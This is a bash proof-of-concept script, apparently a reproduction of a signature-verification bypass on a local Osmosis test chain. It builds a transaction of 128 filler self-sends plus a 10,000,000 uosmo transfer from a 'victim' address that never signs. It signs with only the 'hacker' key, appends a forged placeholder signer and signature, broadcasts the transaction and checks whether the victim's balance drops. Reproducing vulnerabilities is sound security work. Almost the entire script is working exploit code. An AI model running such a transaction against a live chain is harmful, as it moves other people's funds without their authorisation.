#!/bin/bash
# Settings for a reproduction run against a local test chain
# (chain id "localosmosis", "test" keyring backend).
BINARY=osmosisd
# NOTE(review): the tilde is quoted, so the shell never expands it and the
# literal string "~/.osmosisd-local" is what reaches --home below. Confirm this
# matches the directory the local chain was initialised with.
CHAIN_HOME='~/.osmosisd-local'
# Left as one string on purpose: it is expanded unquoted later so that it
# word-splits into three separate flags.
TX_FLAGS="--chain-id=localosmosis --keyring-backend=test --home=${CHAIN_HOME}"
# Resolve the addresses of the two test-keyring keys used by the run.
HACKER_ADDR=$($BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a hacker)
VICTIM_ADDR=$($BINARY --keyring-backend=test --home=$CHAIN_HOME keys show -a val)
# Build msgs.json: an unsigned transaction whose body holds 129 bank MsgSend
# messages (128 filler messages from the loop below plus one final transfer).
# signer_infos and signatures are written empty here; the signing step further
# down fills them in.
# NOTE(review): the addresses in the JSON are hard-coded instead of using
# HACKER_ADDR / VICTIM_ADDR. Presumably they are the local test keyring's
# "hacker" and "val" keys - confirm, otherwise the balance report at the end
# of the script looks at different accounts than the ones in the payload.
cat << EOF > msgs.json
{
"body": {
"messages": [
EOF
# 128 identical sends of 10 uosmo where sender and recipient are the same address.
for i in {1..128}; do
cat << EOF >> msgs.json
{
"@type": "/cosmos.bank.v1beta1.MsgSend",
"from_address": "osmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7",
"to_address": "osmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7",
"amount": [
{
"denom": "uosmo",
"amount": "10"
}
]
},
EOF
done
# Final (129th) message: 10000000 uosmo from a second address to the address
# used in the loop. The sender of this message never signs the transaction, so
# a node that verifies every required signer has to reject the whole
# transaction; this script checks whether that verification is skipped.
cat << EOF >> msgs.json
{
"@type": "/cosmos.bank.v1beta1.MsgSend",
"from_address": "osmo12smx2wdlyttvyzvzg54y2vnqwq2qjateuf7thj",
"to_address": "osmo1d6aldupd067vm4807qvkcm20j5ts2nmhzwu4y7",
"amount": [
{
"denom": "uosmo",
"amount": "10000000"
}
]
}
EOF
# Close the message list and append the rest of the transaction envelope:
# a 12500 uosmo fee, a gas limit of 5000000, and empty signer/signature lists.
cat << EOF >> msgs.json
],
"memo": "",
"timeout_height": "0",
"extension_options": [],
"non_critical_extension_options": []
},
"auth_info": {
"signer_infos": [],
"fee": {
"amount": [
{
"denom": "uosmo",
"amount": "12500"
}
],
"gas_limit": "5000000",
"payer": "",
"granter": ""
}
},
"signatures": []
}
EOF
# Sign the payload with the "hacker" key only, using the amino-json sign mode.
# stderr is merged into the pipe (2>&1), so any error text from the binary also
# ends up in jq's input and can make signed.json invalid.
# NOTE(review): jq is called without a filter; presumably it passes the JSON
# through unchanged - confirm for the installed jq version.
$BINARY $TX_FLAGS tx sign msgs.json --from=hacker --sign-mode amino-json 2>&1 | jq > signed.json
# Append a second signer_info at index 1 (placeholder public key "AAAA",
# sequence "0", SIGN_MODE_LEGACY_AMINO_JSON) and a second signature "AAAA".
# Neither value is a real key or signature, so verification of this signer is
# expected to fail on a node that checks every signature. The result is
# written to signed2.json; signed.json is left untouched.
cat signed.json | \
jq '.auth_info.signer_infos[1] |= .+ {"public_key":{"@type":"/cosmos.crypto.secp256k1.PubKey","key":"AAAA"},
"sequence":"0","mode_info":{"single": {"mode": "SIGN_MODE_LEGACY_AMINO_JSON"}}}' | \
jq '.signatures[1] |= .+ "AAAA"' > signed2.json
# Query the uosmo balance of both accounts and print them under the heading
# passed as $1. Sets the globals VICTIM_BALANCE and HACKER_BALANCE.
report_balances() {
  VICTIM_BALANCE=$($BINARY --home=$CHAIN_HOME query bank balances $VICTIM_ADDR --denom uosmo)
  HACKER_BALANCE=$($BINARY --home=$CHAIN_HOME query bank balances $HACKER_ADDR --denom uosmo)
  echo "$1"
  echo "hacker: $HACKER_BALANCE"
  echo "victim: $VICTIM_BALANCE"
}

report_balances "Balances before:"
# Submit the modified transaction and wait for block inclusion; the JSON
# response is kept in outout.json.
$BINARY $TX_FLAGS tx broadcast signed2.json --output json --broadcast-mode block > outout.json
# Print the log entry of the last message in the response.
jq '.logs[-1]' < outout.json
# Expected on a node that verifies every signer: the broadcast is rejected and
# the victim balance is the same as before. A lower victim balance means the
# final transfer ran without a valid signature from its sender.
report_balances "Balances after:"